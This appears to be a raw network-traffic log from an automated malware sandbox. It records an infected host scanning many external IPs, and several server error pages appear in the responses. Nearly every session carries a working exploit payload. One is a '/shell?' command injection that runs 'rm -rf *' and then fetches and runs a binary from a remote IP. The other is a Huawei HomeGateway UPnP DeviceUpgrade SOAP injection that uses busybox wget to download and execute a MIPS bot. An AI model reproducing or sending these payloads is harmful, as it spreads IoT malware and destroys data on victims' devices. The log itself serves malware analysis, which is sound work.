                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            591192.168.2.233290620.253.71.280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:49.944359064 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:50.064721107 CET238INHTTP/1.1 503 Service Temporarily Unavailable
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:50 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 19
                                                            Connection: keep-alive
                                                            X-INVALIDATE-CACHE: 1
                                                            Data Raw: 73 65 72 76 69 63 65 20 75 6e 61 76 61 69 6c 61 62 6c 65
                                                            Data Ascii: service unavailable


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            592192.168.2.234466295.101.219.23780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:50.045254946 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:50.263853073 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:32:50 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:50 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 35 66 32 36 34 35 66 26 23 34 36 3b 31 37 30 36 32 37 39 35 37 30 26 23 34 36 3b 62 33 61 30 62 65 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;c5f2645f&#46;1706279570&#46;b3a0be4</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            593192.168.2.2334368106.75.143.13180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:50.178294897 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:50.529603004 CET336INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.12.2
                                                            Date: Fri, 26 Jan 2024 14:32:50 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 169
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            594192.168.2.235536623.46.227.11580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:50.641050100 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:50.760978937 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:50 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:50 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 38 30 32 63 34 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 37 30 26 23 34 36 3b 32 66 64 64 33 36 62 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;9802c417&#46;1706279570&#46;2fdd36bc</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            595192.168.2.2348074152.0.245.2080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:50.653182983 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:50.790057898 CET316INHTTP/1.1 200 OK
                                                            Content-Type:text/html; charset=UTF-8
                                                            Pragma:no-cache
                                                            Cache-control:no-cache, no-store, max-age=0
                                                            Transfer-Encoding:chunked
                                                            X-Frame-Options:SAMEORIGIN
                                                            Connection:Keep-Alive
                                                            X-XSS-Protection:1; mode=block
                                                            Content-Security-Policy:default-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                            Jan 26, 2024 15:32:50.790612936 CET1286INData Raw: 64 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                            Data Ascii: d36<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=ut
                                                            Jan 26, 2024 15:32:50.790627003 CET1286INData Raw: 20 3d 3d 20 27 3a 27 29 29 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 7d 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 4c 69 73 74 20 3d 20 41 64 64 72 65 73 73 2e 73 70 6c 69 74
                                                            Data Ascii: == ':')) { return false; } List = Address.split(":"); if (List.length > 8) { return false; } for (var i = 0; i < List.length; i++) { if (false == IsIPv6AddressUsho
                                                            Jan 26, 2024 15:32:50.790637970 CET858INData Raw: 6c 73 65 0d 0a 7b 0d 0a 76 61 72 20 4c 69 73 74 20 3d 20 48 6f 73 74 49 6e 66 6f 2e 73 70 6c 69 74 28 22 3a 22 29 3b 0d 0a 69 66 28 4c 69 73 74 2e 6c 65 6e 67 74 68 20 3e 3d 20 33 29 0d 0a 7b 0d 0a 2f 2a 20 69 6e 63 6c 75 64 65 20 74 77 6f 20 6f
                                                            Data Ascii: lse{var List = HostInfo.split(":");if(List.length >= 3){/* include two or more than two ":" */if(true == IsIPv6AddressValid(HostInfo)){/* host string not include port */window.location="https://[" + HostInfo + "]:" + SSLPort;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            596192.168.2.234083645.120.178.15180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:50.723140001 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:50.928416014 CET338INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Fri, 26 Jan 2024 14:32:50 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            597192.168.2.23411921.232.247.1580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:50.921300888 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:51.203340054 CET509INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:32:50 GMT
                                                            Server: lighttpd
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            598192.168.2.2360486163.22.230.7280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:50.944087982 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            599192.168.2.233357466.251.154.22480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:50.968261003 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:51.295738935 CET499INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:40:36 GMT
                                                            Server: Apache
                                                            X-XSS-Protection: 1; mode=block
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            600192.168.2.2336632156.77.139.5637215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:52.336504936 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            601192.168.2.2340596156.254.87.6337215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:52.520634890 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:54.012136936 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:55.771642923 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
